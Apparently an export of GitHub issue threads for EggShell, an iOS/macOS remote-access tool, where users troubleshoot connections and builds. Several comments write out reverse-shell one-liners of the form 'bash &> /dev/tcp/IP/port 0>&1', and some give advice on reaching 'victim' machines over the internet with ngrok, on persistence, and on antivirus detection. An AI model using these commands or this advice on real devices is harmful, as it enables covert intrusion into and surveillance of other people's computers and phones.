Ive done nothing different to when i use the previous version which still works
Great product appriciate your efforts

[2018-01-28 14:28] valentino00776 commented on #77
Any ideas what i can do ?

[2018-01-28 20:08] neoneggplant commented on #77
Thanks! I am going to try and write some more debugging functionality to further diagnose this problem, a few other people are also having this same issue, sorry for the inconvenience!

[2018-01-29 11:07] computer00776 commented on #77
Thanks Buddy
Seriously Rock
Thanks for the effort

[2018-02-04 20:38] kalidoscopio opened #78 "V 3.0.0 "establishing secure connection""
V 2.3 works perfect in the LAN for me but the V 3.0 it´s always stay in "establishing secure connection" and nothing happens. You Know were I can download the V2.3 again?
And another question. Someone can use this amazing code out of LAN?
I'm trying with ngrok but not works for me.

Thanks for share your work.

[2018-02-07 02:14] neoneggplant commented on #78
Currently working on implementing a debug mode to help me diagnose this problem. Sorry for the inconvenience, since I am not able to recreate it myself, perhaps you can help me test when I release it.  Also, on the target machine try deleting /tmp/.espl and see if this fixes the issue

[2018-02-07 02:17] neoneggplant commented on #78
also, you can download version 2.2.1 here https://github.com/neoneggplant/EggShell/tree/dd9f71eb3cc59ebb2d0e3bf27fa6affa0f47b993

[2018-02-11 12:37] valentino00776 commented on #77
Is there anything i can do to help test anything for you ?

[2018-02-14 18:34] mikk146m opened #80 "Virtual Machine"
I have problems when i run the EggShell on a virtual machine (VirtualBox), where i run Linux Kali.
When i run a payload on the Kali machine, and enter the bash (bash &> /dev/tcp/10.0.2.15/4444 0>&1) on my mac nothing happens.
Can you help me?

[2018-02-15 00:27] neoneggplant commented on #80
you may have to forward some ports in virtualbox to allow it to be seen on your network, what is your local ip on your mac look like?

[2018-02-19 10:46] achraf1996 opened #81 "Error can t read firebase url"
I keep getting this error, i tryied putting the url in semacollens and also without. But still no succes even tryied hardcoding the value in webpack.config.js, I keep getting the same error. I used the example.env and changed the name to process.env.

I hope you can help me,

![firebaserror](https://user-images.githubusercontent.com/26969626/36374105-7f32c506-156a-11e8-8b7a-5f7cb0f6efff.JPG)

[2018-02-19 11:50] #81 closed

[2018-02-24 11:39] AudaciousSage opened #82 "I don't know how to hack ios using eggshell can anyone tell me i'm using a macbook air I'm new to eggshell"

[2018-02-26 09:00] hsaevol opened #83 "Cannot get past 'Establishing Secure Connection...'"
Hello I am using the current build on linux. When I try to connect my iOS 11.0.3 I get hung up at 'Establishing Secure Connection...' I have traced the execution and pasted below. Any suggestion, need help.

[*] Listening on port 4444...
server.py(151):         try:
server.py(152):             conn, addr = s.accept()
 --- modulename: socket, funcname: accept
socket.py(206):         sock, addr = se

[2018-03-25 09:58] LiesRapas commented on #83
Yea, me neither...

[2018-03-25 09:58] LiesRapas commented on #82
There are a bunch of yt tutorials on this

[2018-03-25 20:40] #82 closed

[2018-03-25 20:41] neoneggplant commented on #83
are you running eggshell inside of a virtual machine?

[2018-03-25 21:01] LiesRapas commented on #83
Nah, i'm running it on a raspberry pi, with kali linux, but i encountered
the same issues on mac os high sierra when i installed it on my macbook pro

2018-03-25 22:41 GMT+02:00 Lucas Jackson <notifications@github.com>:

[2018-03-27 02:31] hhdevteam commented on #83
@neoneggplant it's because the openssl libraries are not being statically linked in the xcode project properly. It's dynamic, and if the target hasn't installed openssl via macports or brew then the dylibs aren't available. I have this working now in an xcode project, i'll tidy and put in a PR.

[2018-03-28 13:37] LiesRapas commented on #83
Thanks a lot ! it worked when i installed openssl !

2018-03-27 4:31 GMT+02:00 hhdevteam <notifications@github.com>:

[2018-03-28 19:29] hsaevol commented on #83
Looking forward to exploring and all the neat features!,

Sent from my iPhone

[2018-03-29 17:24] neoneggplant commented on #83
@hhdevteam Awesome that you found that, I was having a hard time recreating the issue!

[2018-04-05 03:24] neoneggplant commented on #83
Can anyone who is having the issue let me know if this works? I believe the library is now statically linked in esplmacos
https://github.com/neoneggplant/EggShell/tree/dev

[2018-04-11 05:41] keshaipad commented on #83
@neoneggplant
Something wrong with that one "dev" branch I think...
[code]

[2018-04-11 16:01] neoneggplant commented on #83
@keshaipad sorry about that, just pushed a fix, try now :)

[2018-04-12 19:45] keshaipad commented on #83
Hehe. There now another problem.
I try to connect - but nothing happened.
And when exit from MultiHandler - get some error about ssl
[code]

[2018-04-13 07:38] keshaipad commented on #83
**Linux:** (server)
_Python 2.7.6
OpenSSL 1.0.1f 6 Jan 2014_

**Mac:** (client)
_Python 2.7.10
OpenSSL 0.9.8zg 14 july 2015_

[2018-04-15 15:08] computer00776 commented on #83
So do we need to install openssl on target ?
if so can someone tell me the command to do so please.
Thanks guys

[2018-04-15 18:37] neoneggplant commented on #83
the dev branch should have the esplmacos ssl library statically linked

[2018-04-17 10:01] computer00776 commented on #83
Sorry buddy
Still not working
Stuck on establishing secure connection even with the tree/dev version

[2018-04-17 16:14] neoneggplant commented on #83
is the target a linux machine? Openssl will have to be installed

[2018-04-17 17:26] computer00776 commented on #83
no its a mac machine
do i still need to install Openssl ?

[2018-05-04 11:43] JoeyBenucci opened #84 "2.2.1 Can’t interact with session"
Connected to a macbook and it shows 1 open session but when i try to interact with it it says “can’t intercat with session.” Using terminal on mac os high

[2018-05-04 21:33] JoeyBenucci commented on #84
Edit: 2.2.2

[2018-05-08 21:15] saeed9321 opened #85 "SSL error: [SSL: HTTP_REQUEST] http request (_ssl.c:726)"
this error appears every time i try to execute the shell in other device.
what do you think is causing this?
even if i tried to open the lhost link in the browser manually like 192.168.100.3:4444

[2018-05-09 04:56] Liang011 opened #86 "Help me!!! "[*] No active sessions""
Help me!!!  Why do I get a message that "[*] No active sessions" ???
Please let me know how to solve an error.

<pre><font color="#EEEEEC">Version: 3.0.0</font>
<font color="#EEEEEC">Created By Lucas Jackson (@neoneggplant)</font>
<font color="#EEEEEC">----------------------------------------</font>
<font color="#EEEEEC">Menu:</font>

<font color="#EEEEEC">    1): Start Server</font>
<font color="

[2018-05-09 05:03] Liang011 commented on #86
root@localhost:~# ps auxww | grep python | grep -v grep
root      1823  0.0  0.6 202976 11808 pts/0    Sl+  13:17   0:00 /usr/bin/python ./eggshell.py
root@localhost:~#

[2018-05-09 07:16] #86 closed

[2018-05-25 16:31] molomilo commented on #83
Hello, thank you for your Eggshell.
I still have'nt a solution for the etablishing secure connection. New?
I am on kali to iphone 4 in 7.1.2 jaillbreak.
Open SSL is installed on the iphone but nothing works. Even the version with DEV does'nt work.
Need help.

[2018-05-29 07:46] annata83 opened #87 "SyntaxError: invalid syntax"
By Runnin python eggshell.py returns:

File "eggshell.py", line 48
    print " " * 4 + str(number_option) + "): " + payload.name
            ^
SyntaxError: invalid syntax

[2018-05-29 14:42] neoneggplant commented on #87
you need python2.7, I think your using python 3

[2018-05-29 14:42] #87 closed

[2018-05-31 18:11] Linux0000 opened #88 "I need a bit of help"
I am very much new to Kali Linux and so i was wondering if this still works on the latest version of iphone devices. Also, when i get the bash code from the payload, how would integrate the script in an iphone device? Would i have to insert it in an image and send it to the victim or shorten the url? Even when i shorten the url, and try to enter it in safari app of my iphone device (latest version

[2018-06-07 09:58] Divingpig commented on #85
Any update?

[2018-06-07 18:01] neoneggplant commented on #85
looks like your trying to open the link in the browser, you need to run the payload as a shell script or in terminal

[2018-06-14 08:42] N1kRolexx opened #89 "A great job!"
I have been using 2.2.1 version for a long time and it was really good and handy. I didnt check the repository for a long time because the version 3 did not work, but then i installed openssl on mac and started using it. Noticed tab-completion, correct work of all modules, encryption with a good connection speed.

_Lucas Jackson, you are doing/did a really great job and wrote an awesome tool! Have

[2018-06-14 18:23] neoneggplant commented on #89
Thanks! I appreciate it :)

[2018-06-14 18:23] #89 closed

[2018-06-16 18:05] computer00776 commented on #78
is there any update on the fix ?

[2018-06-25 18:12] TheMaker101 opened #90 "There is a traceback error that I have a problem with..."
So when I type in python.eggshell an error pops up. The error is:

Traceback (most recent call last):
  File "eggshell.py", line 2, in <module>
    from modules import server
  File "/root/eggshell/modules/server.py", line 1, in <module>
    import socket, ssl, os, json, sys
  File "/usr/local/lib/python2.7/ssl.py", line 60, in <module>
    import _ssl             # if we can't import it, let the

[2018-07-07 23:53] KodiacSecurity commented on #83
As stated above the ssl library is statically linked in the dev-branch. It solves the problem. Tested on Sierra, Yosemite and Snow leopard.

If not, fall back to https://github.com/neoneggplant/EggShell/tree/dd9f71eb3cc59ebb2d0e3bf27fa6affa0f47b993

[2018-07-09 15:43] mikk146m opened #91 "My console stuck in Listening on port 4444..."
Can anybody help me? My console is stuck in my console stuck in "Listening on port 4444...", I have entered the "bash &> /dev/tcp/"my IP"/4444 0>&1" on the victims' mac?
Thanks in advanced :-)

[2018-07-09 15:44] #80 closed

[2018-07-10 17:09] #70 closed

[2018-07-10 17:10] #67 closed

[2018-07-11 08:43] nbshenxm opened #92 "UnboundLocalError: local variable 'result' referenced before assignment"
When I try to open a connection on a ubuntu 16.04 machine, the connection can't be established with following error messages (I'm using eggshell version 3.1.1):

[*] Establishing Secure Connection...
Traceback (most recent call last):
  File "eggshell.py", line 159, in <module>
    eggshell.menu()
  File "eggshell.py", line 143, in menu
    self.menu()
  File "eggshell.py", line 142, in menu
    c

[2018-07-11 08:47] nbshenxm commented on #92
BTW, this issue wouldn't occur if you use eggshell version 3.0.0. I guess get_modules function need to be modified in version 3.1.1.

[2018-07-11 14:08] neoneggplant commented on #92
Will push an update for this asap

[2018-07-17 13:06] DeDogeGod commented on #91
I have the same problem because my victim's mac refuses to connect and says operation times out.

[2018-07-19 13:13] DeDogeGod opened #93 "Operation Timed Out"
When I try connecting to my victim's computer, it tries to connect for about 5 mins and says Operation Timed Out while on my side it is still listening. But if I try to connect to my own computer, it connects right away. Both my computer and victims computer is the latest version of osx. Both Computers are on the same network. I have tried on 2 computers and both failed.

[2018-07-21 10:12] N1kRolexx opened #94 "How to make openssl work n windows?"
Hello everyone.
When I try to run EggShell on windows, it crashes when session arrives. Probably because Openssl is not installed.
Openssl only has binaries for windows. I am not a programmer myself, so can anyone guide me on how to make EggShell work with openssl binaries on windows?

[2018-07-27 05:11] paragthacker opened #95 "Interact error!"
![ffba7718-e941-4ca2-ae30-2c01bc549384](https://user-images.githubusercontent.com/19321204/43302637-5b7f3ba8-9189-11e8-9899-cfbff4dd0cf3.png)

[2018-07-30 02:53] fahadlife commented on #93
Having the same exact problem

[2018-07-31 09:00] DeDogeGod commented on #93
I fixed it by running EggShell on a linux where it supported file sharing.

[2018-07-31 09:25] fahadlife commented on #93
Thanks for your input.
Question, for eggshell to work does require the target computer to be on the same local network?

[2018-08-01 07:33] #94 closed

[2018-08-02 00:46] DeDogeGod commented on #93
Yes, I think so. But I think you can port forward it.

[2018-08-05 19:07] GhostfaceG99 opened #96 "Operation timed out"
So I'm pretty new to this so that's why this question might be dumb.
I'm still in the testing phase so right now im just trying to connect to my Jailbroken IPhone. I'm running eggshell on Kali Linux in a Virtual Machine to get the payload. But when i exacute the command I get from the computer on my iPhone it just does nothing for like a minute and then it says "operation timed out". I'm using New

[2018-08-13 18:29] xmatrex commented on #95
what's ios version?

[2018-08-13 19:18] xmatrex opened #97 "can i run it with python 3.6 in ios 11.3.1 electra?"
i tried many times to install and run python 2.7 without success always get kill : 9 error
tried ldid -s with no success too i tried to install python 3.6 with pip it work but cant run your eggshell i have ip6s  ios 11.3.1 jailbroken with electra
i have some questions
1.any way to get py2.7 run on 11.3.1 without kill error if yes please told me where to download depends and py file
thanks and i'm

[2018-08-14 10:58] 5H4D0WILA opened #98 "Device unrecognized trying python payload"
every time i try to connect it says that
i´m on a jailbroken iphone 4s with ios .3.5

[2018-08-23 09:25] kaaetech opened #99 "Lazagne stuck"
I've tried running Lazagne manually with the commands I can see it sends, it works. It doesn't print the result of Lazagne when executing it from Eggshell though. Stuck at "Running".

[2018-08-23 18:47] Austinnnn commented on #46
how to run the pay load can i get help

[2018-08-24 20:23] matthias16 opened #100 "Cant connect"
How do i get the script to run on the phone?

[2018-09-05 04:51] fahadlife opened #101 "Eggshell with an external nerwork"
I have been using Eggshell with my other laptop on the same local network and it work perfect.

My question is, how can I make it work while the victim computer is connected to another network?
Will appreciate your suggestion  ..

[2018-09-05 16:51] shegner commented on #83
I connect with Kali Linux (up to date) to an older iPad with iOS 9.3.5 (jail breaked, MTerminal). I tried master and dev branch. No Luck. Eggshell hangs on 'Establishing Secure Connection...' So I tried the older version as KodiacSecurity proposed. That work's, but only a few commands are working like sysinfo or alert. Camera, open app etc. are NOT working. Is there a version, I can use, so that t

[2018-09-05 17:07] #101 closed

[2018-09-08 00:11] cloud3799 commented on #97
I’m also having this same issue, does anyone know a fix?

[2018-09-21 13:52] nawwafsalman commented on #100
i have the same question

[2018-09-21 13:53] nawwafsalman commented on #95
i have the same error, it was on kali linux machine though not IOS. cause i have no idea how to run bash command on IOS

[2018-09-21 20:09] Puhovskiy commented on #46
Hello, can you explain, how shell can be injected into iframe html5, on ios safari? I think that the mechanism based on javascript, isn't it?

[2018-09-21 20:15] Puhovskiy opened #102 "Penetration testing html5 injected."
Hello, can you explain how shell can be injected into iframe html5, on ios safari? I think that the mechanism based on javascript, isn't it?

[2018-09-22 16:18] neoneggplant commented on #100
The iOS device must be in a jailbroken state. You can then run the script via terminal app or through ssh

[2018-09-22 16:18] #100 closed

[2018-09-23 06:00] #98 closed

[2018-11-23 11:40] hammi1 opened #103 "Persistence not working in macOS"
After running persistence install or persistence uninstall (for macOS victim connected to eggshell running on Linux Mint 19) the persistence does not work. There is no reconnection occurring back to my host.

In the python code for persistence_macos.py, the commands show to only display the text "Installing" or "Uninstalling" but no code to actually run persistence, as is the case in the teensy pa

[2018-11-23 15:18] lucasjacks0n commented on #103
it should work on root and non root, even after reboot

[2018-11-29 00:05] natesales commented on #95
I had this same issue. @neoneggplant If you need help, I have a patch for it.

[2018-11-30 21:17] #103 closed, assigned to nobody

[2018-12-15 22:13] hammi1 commented on #68
I still have this problem. With a persistent eggshell payload, running "screenshot" hangs the terminal, but running it when the payload is typed into a terminal works. Is there a fix for this?

[2018-12-24 15:37] Hupstep commented on #95
Can u help us with it i would appreciate it.

[2018-12-24 15:46] Hupstep commented on #95
i found a functional one https://github.com/zwb521fang/eggshell :)

[2018-12-26 13:57] imranzel opened #104 "stuck at listening on port 444"
stuckkk

[2018-12-28 03:13] lucasjacks0n commented on #104
444 or 4444? You need to use ports 1024 and above, also are your server and target device on the same network?

[2018-12-28 17:21] ghost opened #105 "/del"
**Hardware**: ipad mini 1
**Jailbreak Tool**: Phoenix
**Terminal**: WhiteTerminal

**Attacker Device**: Xiaomi Mi A1
**Attacker Device Terminal**: Termux

When I trying connect to my ipad , it stucked on this step:
Establishing secure connection.

[2019-01-06 01:48] vivianfrench2 opened #107 "I have the script."
This is my payload: bash &> /dev/tcp/47.16.110.172/3000 0>&1

How do I run the script to send it to the targets phone?

And does Eggshell work if the person you're sending it to is on a different network than you?

[2019-01-12 23:39] iraizo opened #108 "user error"
I want a mac to connect from a other network, im on osx i got my ip from the settings then just port scanned it and got an open tcp port if they tried to connect it says "operation timed out"

[2019-01-16 15:03] hammi1 commented on #107
You need to get it to run on the iDevice's terminal. Either it needs to be jailbroken with a terminal app, or you find a new WebKit (or similar) exploit and send it to them, with the payload encoded. As it's a one liner payload, you need physical access to their Mac device, and almost impossible with even physical access to an iPhone/iPad, unless its jailbroken, or (as previously mentioned) you ha

[2019-01-16 15:05] hammi1 commented on #91
There may be a firewall in place blocking the connection. You also need to be on the same network (so the local IP address routes correctly) _or_ have your server port forwarded and the payload contain your public IP. If its on the same network, check there is nothing blocking it by testing it with something like netcat.

[2019-01-21 07:24] vivianfrench2 commented on #107
Oh, that sucks.

[2019-02-11 17:56] tschinksi03 opened #109 "teensy Keyboard Emulation not working"
Instead of the teensy, I'm using the attiny85 Digispark but it doesn't work. The error says:

Arduino: 1.8.8 (Windows Store 1.8.19.0) (Windows 10), Board: "Digispark (Default - 16.5mhz)"

C:\Program Files\WindowsApps\ArduinoLLC.ArduinoIDE_1.8.19.0_x86__mdqgnx93n4wtt\libraries\Keyboard\src/Keyboard.h:25:17: fatal error: HID.h: No such file or directory

 #include "HID.h"

                 ^

compil

[2019-02-11 18:47] thehappydinoa commented on #108
This will not work unless you set up [port-forwarding](https://www.noip.com/support/knowledgebase/general-port-forwarding-guide/) or [ngrok](https://ngrok.com/docs).

[2019-02-11 18:48] thehappydinoa commented on #105
Do you have root on the android device? You have to be root to open a port on the device. If it is not rooted I would suggest Magisk.

[2019-02-11 19:36] tschinksi03 commented on #109
I found the error, I had to write it new with the Functions of the Digikeyboard.h library...
Sorry just found this out now.

<sub>Sent with <a href="http://githawk.com">GitHawk</a></sub>

[2019-02-12 02:58] thehappydinoa opened #110 "Issues with crypto"
[code]
Having a hard time building without it.

[2019-02-12 20:46] iraizo commented on #108
Alright im gonna try ngrok out, thank you!

[2019-02-12 21:09] thehappydinoa commented on #108
Also make sure to change the title of the issue as it is user error

[2019-02-13 17:59] iraizo commented on #108
Im probaly too dumb to do it i should do ngrok tcp 1024 or something, right?

[2019-02-13 22:45] thehappydinoa commented on #108
Try port 4444

[2019-02-19 03:34] vivianfrench2 opened #112 "Ngrok"
I am trying to create a payload on Eggshell using ngrok as a tunnel for port forwarding. How do I do so?

I have another question as well: does this work on jailbroken iPhones with ios 12 or higher? Thank you.

[2019-02-19 20:54] vivianfrench2 commented on #108
I have a question. I am trying to use ngrok in EggShell. I type ngrok tcp 8080. Then, in Eggshell, I type the option of payload I want. After that, I type the LHOST=0.tcp.ngrok.io and the LPORT as 19335. Maybe I am typing the LHOST wrong or something, I don't know. I am using the info ngrok provides for me as a tunnel. The payload doesn't work as a result. What should I do?

[2019-02-20 21:06] iraizo commented on #108
oh yeah am i still using my ip ?

[2019-02-20 21:34] thehappydinoa commented on #108
No it's the hostname or ip ngork gives you

[2019-02-20 22:19] vivianfrench2 commented on #108
How do you find the IP ngrok gives you? I only see the hostname
0.tcp.ngrok.io!!!

On Wed, Feb 20, 2019, 4:34 PM Aidan Holland <notifications@github.com wrote:

[2019-02-20 22:20] vivianfrench2 commented on #108
How do you find the IP Ngrok gives you? I used the hostname 0.tcp.ngrok.io and it didn't work at all!!!!

[2019-02-21 04:44] thehappydinoa commented on #108
It should be returned after setting up [TCP](https://ngrok.com/docs#tcp)

[2019-02-21 15:16] vivianfrench2 commented on #108
How do you set up TCP? Where do you see it returned?

On Wed, Feb 20, 2019 at 11:44 PM Aidan Holland <notifications@github.com>
wrote:

[2019-02-23 15:29] iraizo commented on #108
if i would use tcp://0.tcp.ngrok.io:18531 it would just not work "[Errno 8] nodename nor servname provided, or not known"

[2019-02-23 17:30] vivianfrench2 commented on #108
It would give me a different IP but it would not work.

On Sat, Feb 23, 2019 at 10:29 AM raizo <notifications@github.com> wrote:

[2019-02-23 21:49] iraizo commented on #108
ok i got the ip etc but the ttl would go up but eggshell wont recognize

[2019-02-23 21:50] iraizo commented on #108
ping 0.tcp.ngrok.io

[2019-02-24 18:52] vivianfrench2 commented on #108
I tried that but it didn't work. Eggshell doesn't recognize the ip address.
😰😰😰

On Sat, Feb 23, 2019 at 4:50 PM raizo <notifications@github.com> wrote:

[2019-03-28 02:00] TecTom101 opened #115 "Detection Rate and Evasion?"
For Macs, the bash script works fine but the payload that is delivered is easily detected and I'm wondering if there's a way for me to protect the payload. Overall it's pretty good besides this one issue if this is a mistake at all. Thank you!

[2019-04-08 01:00] ghostwalkr commented on #115
This isn't really an issue with the code. It's not intended to bypass AV (as far as I know). How is the payload getting detected?

[2019-04-08 01:01] TecTom101 commented on #115
It was just being detected by antivirus when it was sent over. But I'm good right now so we can drop this thread. Thank you though, I forgot about this post!

[2019-04-29 21:07] #105 closed, assigned to nobody

[2019-05-02 14:06] Good0ne1 opened #116 "Does EggShell work on IOS 12 ?"
Does EggShell still work for IOS 12 devices or is the exploit closed? thank you!:)

[2019-05-31 05:28] anon12838 opened #117 "Webcam"
Whenever I try the webcam command, it just gets stuck at “Taking Picture” Any fix for this????

[2019-06-04 16:57] SavageSOC opened #118 "Download Directory"
Not sure it if it has not been implemented or a bug but I can't seem to download a whole directory and can only download one file at a time.

[2019-06-30 03:47] chengus opened #119 "Doesn't work with the newest Mac OS (including Mojave)"

[2019-06-30 03:50] chengus commented on #104
Also for me, I am using port 4444 and it always stuck on listening. Even after I typed the command into the victim's terminal. And yes we are at the same network. Thank you

[2019-07-04 21:25] ghost opened #120 "HELP!HELP! I CANT BUILD PACKAGE"
I can not build/make esplios!
theos installed
make installed
Ios jailbroken (11.3.1)
error: libcrypto.a not supported armv7
error: liblaunch.dylib not supported arm64

[2019-07-23 11:43] Developer103 opened #121 "Eggshell on ios"
I got everything working with mac os, and I know that you can use eggshell for ios as well.  But ios does not have a terminal, so what should I do to get it on ios?

[2019-07-26 00:51] lucasjacks0n commented on #121
phone must be jailbroken

[2019-07-26 00:51] #121 closed, assigned to nobody

[2019-08-05 16:31] careyjames commented on #116
i would like to know this too, and what about ios13?

[2019-08-13 01:25] verygoodname-sudo commented on #88
Having the same problem.

[2019-08-16 04:00] edenhikri opened #122 "Using EggShell with ngrok"
How do I use Eggshell with Ngrok to hack computers over WAN?

[2019-08-27 08:51] ericfly02 opened #123 "problem with ios safari"
when I try to enter the link into an iphone, on the eggshell console it shows me that it can't be opened with safari, there's any way to solve it?

(https://user-images.githubusercontent.com/20001491/63756672-0af76080-c8b9-11e9-8061-a9dc92061378.png)

[2019-09-02 17:56] lucasjacks0n commented on #123
Eggshell does not connect through safari, I assume you were trying to do what was done on the youtube exploit demo, that was with a safari exploit. You need to run the script either through a terminal via cydia or over ssh.

[2019-09-02 17:56] #123 closed, assigned to nobody

[2019-10-11 15:50] RaakinShah opened #124 "No such file or directory: /src/resources/esplinux"
Traceback (most recent call last):
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()

  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 754, in run
    self.__target(*self.__args, **self.__kwargs)

  File "/Users/[me]/EggShell-RAT/modules/server/server.py", lin

[2019-11-12 02:28] AtomicVein opened #125 "How do I connect to iOS 13 phone"
How would I connect to my phone, I’m jailbroken. Not sure what to put in my terminal on my phone.

[2019-11-22 06:45] danielcunn123 commented on #125
Works fine on IOS 13.2.3 (Checkra1n Jailbreak)

`echo '[PAYLOAD_DATA]' > payload.sh`
`chmod u+x`
`./payload.sh`

Then execute EggShell multi-handler or NetCat from ATTACKER machine to listen for connections.

[2019-12-04 04:02] AtomicVein commented on #125
This didn't seem to work for me. could you fill in {payload data with an example of how you put it in, and chmod u+x says its an invalid command and i need something after u+x

[2019-12-09 07:41] vintendpower commented on #125
Would love to Look more into this and offer what help I can. I was messing with it today for ios 12.0.1 and I had a hard time installing it Cause Silo (Iphone max xs here with Chimera) Was having issues installing it due to Depends.

So you are saying you are able to get this working on ios 13 as well? Do most of the features still work? mic and so on  ?

[2019-12-09 07:43] vintendpower commented on #116
Was trying this on ios 12 today and was able to get it loading .. but was having issues with commands like mic record and so on.. installing it on Iphone max xs ios 12.0.1 Was an issue cause of chimera and Silo

[2019-12-09 08:43] danielcunn123 commented on #125
@AtomicVein hopefully this issue is resolved after we made contact via email.
If so, please close this issue.

@vintendpower on a system running MacOS/Linux run the following:
`git clone https://github.com/neoneggplant/EggShell.git`
`cd EggShell`
`python eggshell.py`

Requirements to run on host should be Python2 - (Python3 wont work)

![EggShell_1](https://user-images.githubusercontent.com/440817

[2019-12-09 20:22] viggou commented on #119
Works fine on Mojave for me. Catalina has some major security updates though so most features don't work there.

[2019-12-11 03:49] #125 closed, assigned to nobody

[2020-01-31 01:45] Kali95739 commented on #123
Is their a way to configure this with safari or not?

[2020-01-31 02:19] Kali95739 commented on #71
Does this work on another person's iPhone not on same network delivery method?

[2020-02-19 17:41] tamerlan99 opened #127 "ZSH shell"
Need new zhs shell for eggshell. Bash is not working on Catalina.

[2020-03-06 09:08] ganjarpanji commented on #116
looking forward for ios 13.

[2020-03-06 15:09] vintendpower commented on #116
What about iOS 13? Lol

[2020-03-13 16:18] viggou commented on #102
that was only possible on iOS 9 due to a bug

[2020-03-13 16:18] viggou commented on #118
zip the directory and download the zip file

[2020-03-25 14:04] Blazejnr commented on #92
please can i get the link for backdating to 3.0.0 because i have the same issue.

[2020-04-08 20:38] Mimmob07 opened #128 "payload file doesnt exist"
the payload file is nowhere to be found!
it says it's in `/dev/tcp/192.168.1.6/8080 0>&1` but it's not
the file doesn't exist
can someone help me find it, please?
[code]

[2020-04-08 23:25] #128 closed, assigned to nobody

[2020-04-08 23:26] Mimmob07 commented on #128
my bad didn't realize` /dev/tcp/192.168.1.6/8080 0>&1` was a command

[2020-05-11 22:10] enty8080 opened #129 "I rewrite for python3"
I rewrite EggShell for python3, but when I try to connect to my iphone I got the stuck on establishing secure connection.

Maybe problem in python3 socket.

[2020-05-16 12:32] enty8080 commented on #129
@neoneggplant are you interesting in your project?

[2020-05-16 12:34] enty8080 commented on #129
I rewrite for python3, add .encode() and .decode() and it really works!!!!!!!!!!! But download cannot download binary and upload cannot upload binary.

[2020-05-16 17:38] #129 closed, assigned to nobody

[2020-05-24 11:22] enty8080 opened #130 "Error while build for armv7, arm64."
[code]

Please @neoneggplant or @nerdtron123 **HELP ME**, I am porting esplios for iOS13.

Also there is an error with libcrypto.a:

[code]

**System:**

* `MacOS High Sierra 10.13.6`
* `Xcode 7.2.1`
* `SDK iPhoneOS9.3`
* `Theos latest version`

Waiting for @neoneggplant and @nerdtron123 help...

[2020-05-24 13:22] enty8080 commented on #130
**HEY**

[2020-05-26 18:22] enty8080 commented on #130
@neoneggplant

[2020-05-31 22:02] enty8080 commented on #130
@neoneggplant

[2020-06-08 14:25] marcel060 opened #131 "stuck on 4444"
[*] SET LPORT (Leave blank for 4444)>
[*] LPORT = 4444
[*] Listening on port 4444...                                  PLS SOMEONE HELP AM USING WINDOWS10 AND I WANNA HACK MY PHONE

[2020-06-12 05:12] Rajmi105 opened #132 "Can't connect my iDevice to EggShell"
Thank you Lucas for EggShell but I have Windows so I don't have NSTask. Can you tell me how can I connect my iDevice to it? I tried the bash command in a terminal (I downloaded from Cydia) but it didn't worked. I tried to connect to the IP adress from Safari but it's said it's not exploit Safari.

[2020-06-12 05:12] Rajmi105 opened #133 "Can't connect my iDevice to EggShell"
Thank you Lucas for EggShell but I have Windows so I don't have NSTask. Can you tell me how can I connect my iDevice to it? I tried the bash command in a terminal (I downloaded from Cydia) but it didn't worked. I tried to connect to the IP adress from Safari but it's said it's not exploit Safari.

[2020-06-21 10:07] vintendpower opened #134 "iOS 13 working?"
Has anyone been able to get this working in iOS 13?

Or is there any work being done.

[2020-06-21 10:11] vintendpower commented on #129
Are you still working on this ? Any luck getting this to work with iOS 13

[2020-07-03 23:48] #108 closed, assigned to nobody

[2020-08-03 12:49] ghost commented on #95
thanks!!!

[2020-11-22 17:49] ghost commented on #134
@vintendpower

Hi.

Our team - @EntySec - now developing new framework for exploiting iOS 10/11/12/13/14 beta.
So it is only on the first stage of developing, but you can try it.

This will be the replacement for **EggShell**.
**EggShell** stopped working since iOS 13 released and we have a solution:

* https://github.com/EntySec/cyclone

Also there is a new payload for iOS 13 developed by @enty80

[2020-11-22 17:50] ghost commented on #133
@Rajmi105

Hi.

Our team - @EntySec - now developing new framework for exploiting iOS 10/11/12/13/14 beta.
So it is only on the first stage of developing, but you can try it.

This will be the replacement for **EggShell**.
**EggShell** stopped working since iOS 13 released and we have a solution:

* https://github.com/EntySec/cyclone

Also there is a new payload for iOS 13 developed by @enty8080:

[2020-11-22 17:51] sim0nov commented on #127
@tamerlan99

Hi.

Our team - @EntySec - now developing new framework for exploiting iOS 10/11/12/13/14 beta.
So it is only on the first stage of developing, but you can try it.

This will be the replacement for **EggShell**.
**EggShell** stopped working since iOS 13 released and we have a solution:

* https://github.com/EntySec/cyclone

Also there is a new payload for iOS 13 developed by @enty8080

[2020-11-22 17:53] ghost commented on #116
@ganjarpanji @vintendpower @Good0ne1

Hi.

Our team - @EntySec - now developing new framework for exploiting iOS 10/11/12/13/14 beta.
So it is only on the first stage of developing, but you can try it.

This will be the replacement for **EggShell**.
**EggShell** stopped working since iOS 13 released and we have a solution:

* https://github.com/EntySec/cyclone

Also there is a new payload for iOS

[2020-12-08 00:24] Spl01ter opened #136 "Feature Request: Make a new child proccess for every shell command"
Connection reset by peer if the command returns permission denied.

[2020-12-11 21:29] #118 closed, assigned to nobody

[2020-12-15 05:37] Spl01ter opened #137 "[Errno 54] Connection reset by peer"
When permission denied on macOS

[2021-01-28 14:16] Spl01ter commented on #110
Same issue here
ld: library not found for -lcrypto
clang: error: linker command failed with exit code 1 (use -v to see invocation)

** BUILD FAILED **

[2021-01-29 12:20] Spl01ter commented on #130
Same problem here

[2021-01-29 12:20] Spl01ter commented on #130
[  8:19PM ]  [ ac@Macintosh:~/EggShell/src/esplios(master✗)(ruby-2.7.0) ]
 $ make
Makefile:1: /makefiles/common.mk: No such file or directory
Makefile:11: /tool.mk: No such file or directory
make: *** No rule to make target `/tool.mk'.  Stop.

[2021-01-29 12:24] Spl01ter commented on #130
[  8:23PM ]  [ ac@Macintosh:~/EggShell/src/esplios(master✗)(ruby-2.7.0) ]
 $ gcc main.mm
In file included from main.mm:10:
./espl.h:10:9: fatal error: 'AppSupport/CPDistributedMessagingCenter.h' file not found
#import <AppSupport/CPDistributedMessagingCenter.h>
        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1 error generated.

[2021-01-29 15:24] enty8080 commented on #130
@Spl01ter It's broken. @neoneggplant should update it.

And next time use `make` or `gcc -x objective-c -framework Foundation`

[2021-01-29 15:24] #130 closed, assigned to nobody

[2021-02-21 07:19] acheong08 commented on #119
Still working on Big Sur

[2021-02-21 07:20] acheong08 opened #138 "Project dead... Anyone avalible to make a new community fork?"

